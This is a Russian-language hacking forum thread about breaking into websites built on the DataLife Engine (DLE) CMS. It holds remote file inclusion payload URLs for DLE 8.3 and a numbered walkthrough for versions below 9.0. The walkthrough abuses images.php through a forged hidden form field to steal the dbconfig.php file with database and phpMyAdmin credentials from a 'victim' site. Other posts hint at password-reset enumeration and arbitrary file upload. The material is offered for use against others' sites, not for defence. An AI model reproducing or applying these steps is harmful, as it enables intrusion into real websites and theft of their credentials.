Старый 19.10.2009, 18:50   #1
Mr.Jhon
RAM 16MB
 
Аватар для Mr.Jhon
 
Регистрация: 18.10.2009
Сообщений: 21
Mr.Jhon Новичок
Mr.Jhon вне форума

Wink Опишите Взлом DLE!


Привет! Многие говорят что DLE движок не победим :ce: Но я Думаю что продвинутые Хакеры без проблем взломают DLE! Так вот если кто что знает поделитесь с Новичками! :comando: :scenic:
  Ответить с цитированием
Ответ: Опишите Взлом DLE!
Старый 19.11.2009, 00:13   #2
gert
RAM 4mb
 
Аватар для gert
 
Регистрация: 10.09.2009
Сообщений: 6
gert на пути к лучшему
gert вне форума
По умолчанию Ответ: Опишите Взлом DLE!

есть пост....

index.php?do=lostpassword&douser=1
2,3,4,5,6,7,8,9........
  Ответить с цитированием
Ответ: Опишите Взлом DLE!
Старый 29.09.2010, 23:09   #3
KasatiK
RAM 64MB
 
Аватар для KasatiK
 
Регистрация: 28.09.2010
Сообщений: 76
KasatiK скоро придёт к известностиKasatiK скоро придёт к известности
KasatiK вне форума
По умолчанию Ответ: Опишите Взлом DLE!

а более новых способов взлома ДЛЕ нету???
Хацкеры-мастера - подскажите
  Ответить с цитированием
Ответ: Опишите Взлом DLE!
Старый 06.10.2010, 17:15   #4
romio
RAM 32MB
 
Аватар для romio
 
Регистрация: 01.10.2010
Сообщений: 40
romio Новичок
romio вне форума
По умолчанию Ответ: Опишите Взлом DLE!

Нет, старый баг с 8.2 и залитием шела давно прикрыт версией 8.3, собственно пока в паблике таких вещей Вы не найдете.
  Ответить с цитированием
Ответ: Опишите Взлом DLE!
Старый 18.12.2010, 14:51   #5
Mr.John
RAM 8MB
 
Аватар для Mr.John
 
Регистрация: 13.12.2010
Сообщений: 13
Mr.John Новичок
Mr.John вне форума
По умолчанию Ответ: Опишите Взлом DLE!

romeo прав, нету пока что публичных как говориться дырок в движке DLE
  Ответить с цитированием
Ответ: Опишите Взлом DLE!
Старый 09.02.2011, 00:40   #6
SWW
Изгнан
 
Аватар для SWW
 
Регистрация: 23.01.2011
Сообщений: 368
SWW - весьма и весьма положительная личностьSWW - весьма и весьма положительная личность
SWW вне форума
По умолчанию Ответ: Опишите Взлом DLE!

несколько сплоитов для DLE 8.3:

Код:
http://skripters.com/engine/inc/include/init.php?selected_language=http://loca
lhost/c.txt?

[Ссылки доступны только зарегистрированным пользователям
. Зарегистрируйся, чтобы увидеть ссылку.][langs]=http://localhost/c.txt
?

[Ссылки доступны только зарегистрированным пользователям
. Зарегистрируйся, чтобы увидеть ссылку.][lang_=[EV!L]

[Ссылки доступны только зарегистрированным пользователям
. Зарегистрируйся, чтобы увидеть ссылку.][skin]]=http://local
host/c.txt?

[Ссылки доступны только зарегистрированным пользователям
. Зарегистрируйся, чтобы увидеть ссылку.][skin]]=http://local
host/c.txt?
  Ответить с цитированием
Последний раз редактировалось SWW; 18.02.2011 в 22:34.
Ответ: Опишите Взлом DLE!
Старый 14.04.2011, 18:21   #7
artk00
RAM 32MB
 
Аватар для artk00
 
Регистрация: 06.04.2011
Сообщений: 52
artk00 на пути к лучшему
artk00 вне форума
По умолчанию Ответ: Опишите Взлом DLE!

есть баг в 8.3, там через images.php можно грузить на сервер все что хочешь_

Добавлено через 1 минуту 18 секунд
Цитата:
Сообщение от vzlomhik Посмотреть сообщение
Подскажите для Дле 9.2
9.2 пока не найдено, у меня друг с Zloy с украины знаком, там пока не ничего не найдено :ce:
  Ответить с цитированием
Последний раз редактировалось artk00; 14.04.2011 в 18:21. Причина: Добавлено сообщение
Ответ: Опишите Взлом DLE!
Старый 15.12.2011, 15:34   #8
PingWin
RAM 32MB
 
Аватар для PingWin
 
Регистрация: 07.10.2010
Сообщений: 40
PingWin на пути к лучшему
PingWin вне форума
По умолчанию Ответ: Опишите Взлом DLE!

Взлом сайта на DLE версии ниже 9.0, инструкция (Работаем через браузер Opera 10).

1. Заходим на сайт жертвы

2. Регистрируемся и авторизуемся на сайте

3. Переходим по ссылке
Код:
http://site.ru/engine/images.php
(где site.ru - адрес жертвы)

4. Открываем исходный код открытой нами страницы и после:
Код:
<input type="hidden" name="area" value=''>
(строка может немного отличаться и повторяться 2 раза, вставляем после 1й)

вставляем:
Код:
<input type="hidden" name="serverfile" value='../../engine/data/dbconfig.php'>
Нажимаем в браузере, под вкладками Применить изменения

5. После этих действий необходимо проверить работоспособность дырки, для этого на странице
Код:
http://site.ru/engine/images.php
, чей исходный код мы редактировали пунктом выше, нажимаем Загрузить. В списке загруженных файлов должен появиться dbconfig.php, мы можем продолжить...

Что бы скачать файл конфига мы должны навести на него указатель мыши и посмотреть ID, затем через Исходный код страницы / Применить изменения мы вставляем в любое место страницы сайта жертвы ссылку вида:
Код:
<a href='http://site.ru/engine/download.php?id=ID_файла'>[download]</a>
и скачиваем файл dbconfig.php с данными для входа в phpMyAdmin, адрес которой обычно site.ru/phpmyadmin/ или site.ru/myadmin/
  Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot